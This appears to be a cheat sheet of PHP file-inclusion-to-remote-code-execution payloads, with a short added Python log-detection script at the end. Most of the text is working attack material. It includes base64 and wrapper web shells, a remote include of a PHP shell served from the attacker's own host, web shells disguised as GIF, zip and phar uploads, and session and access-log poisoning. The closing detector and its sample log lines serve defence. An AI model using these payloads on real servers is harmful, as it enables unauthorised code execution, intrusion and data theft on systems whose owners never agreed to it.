Remote Code Execution

PHP Wrappers

/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id

RCE with data wrapper

curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id"

RCE with input wrapper

curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"

RCE with expect wrapper

RFI

echo '<?php system($_GET["cmd"]); ?>' > shell.php && python3 -m http.server <LISTENING_PORT>

Host web shell

/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id

Include remote PHP web shell

LFI and File Uploads

echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif

Create malicious image

/index.php?language=./profile_images/shell.gif&cmd=id

RCE with malicious uploaded image

echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php

Create malicious zip archive 'as jpg'

/index.php?language=zip://shell.zip%23shell.php&cmd=id

RCE with malicious uploaded zip

php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg

Create malicious phar 'as jpg'

/index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id

RCE with malicious uploaded phar

Log Poisoning

/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd

Read PHP session parameters

/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E

Poison PHP session with web shell

/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id

RCE through poisoned PHP session

curl -s "http://<SERVER_IP>:<PORT>/index.php" -A '<?php system($_GET["cmd"]); ?>'

Poison server log

/index.php?language=/var/log/apache2/access.log&cmd=id

RCE through poisoned server log
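
Detection

Every request on this page leaves a recognisable trace in the web server's access log. The script below is an added example, not part of the original cheat sheet: it flags stream wrappers, session or log file includes, and PHP tags in parameters or the User-Agent. It assumes Apache's "combined" log format; the name classify and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Wrappers and remote schemes this page passes in the include parameter.
WRAPPER_RE = re.compile(r"^(data|php|expect|zip|phar|https?)://", re.I)
# Session and log files the page includes after poisoning them.
POISON_PATH_RE = re.compile(r"/var/lib/php/sessions/sess_|/var/log/")
PHP_TAG_RE = re.compile(r"<\?(php|=)", re.I)
# Apache "combined" log format (assumed): request, status, size, referer, UA.
LINE_RE = re.compile(
    r'"[A-Z]+ (?P<target>\S+) [^"]*" \d{3} \S+ "[^"]*" "(?P<ua>.*)"$')

def classify(line):
    """Return the sorted findings for one access-log line."""
    m = LINE_RE.search(line)
    if not m:
        return ["unparsed"]
    findings = set()
    # parse_qsl percent-decodes values, so encoded payloads match as well.
    for _name, value in parse_qsl(urlsplit(m["target"]).query):
        scheme = WRAPPER_RE.match(value)
        if scheme:
            findings.add("wrapper:" + scheme.group(1).lower())
        if POISON_PATH_RE.search(value):
            findings.add("poisonable-file-include")
        if PHP_TAG_RE.search(value):
            findings.add("php-tag-in-parameter")
    if PHP_TAG_RE.search(m["ua"]):
        findings.add("php-tag-in-user-agent")
    return sorted(findings)

# Constructed sample lines (documentation addresses, harmless payload stand-ins).
PFX = '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] '
SAMPLE_LOG = [
    PFX + '"GET /index.php?language=en HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    PFX + '"GET /index.php?language=data://text/plain;base64,QUJD&cmd=id HTTP/1.1" 200 512 "-" "curl/8.0"',
    PFX + '"GET /index.php?language=phar://./profile_images/a.jpg%2Fa.txt HTTP/1.1" 200 512 "-" "curl/8.0"',
    PFX + '"GET /index.php?language=%3C%3Fphp%20echo%201%3B%3F%3E HTTP/1.1" 200 512 "-" "curl/8.0"',
    PFX + '"GET /index.php HTTP/1.1" 200 512 "-" "<?php echo 1; ?>"',
    PFX + '"GET /index.php?language=/var/log/apache2/access.log&cmd=id HTTP/1.1" 200 512 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(classify(entry), entry[len(PFX):])
```

A php://input request carries its payload in the POST body, which access logs do not record, so only the wrapper name in the query string is visible for that case.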
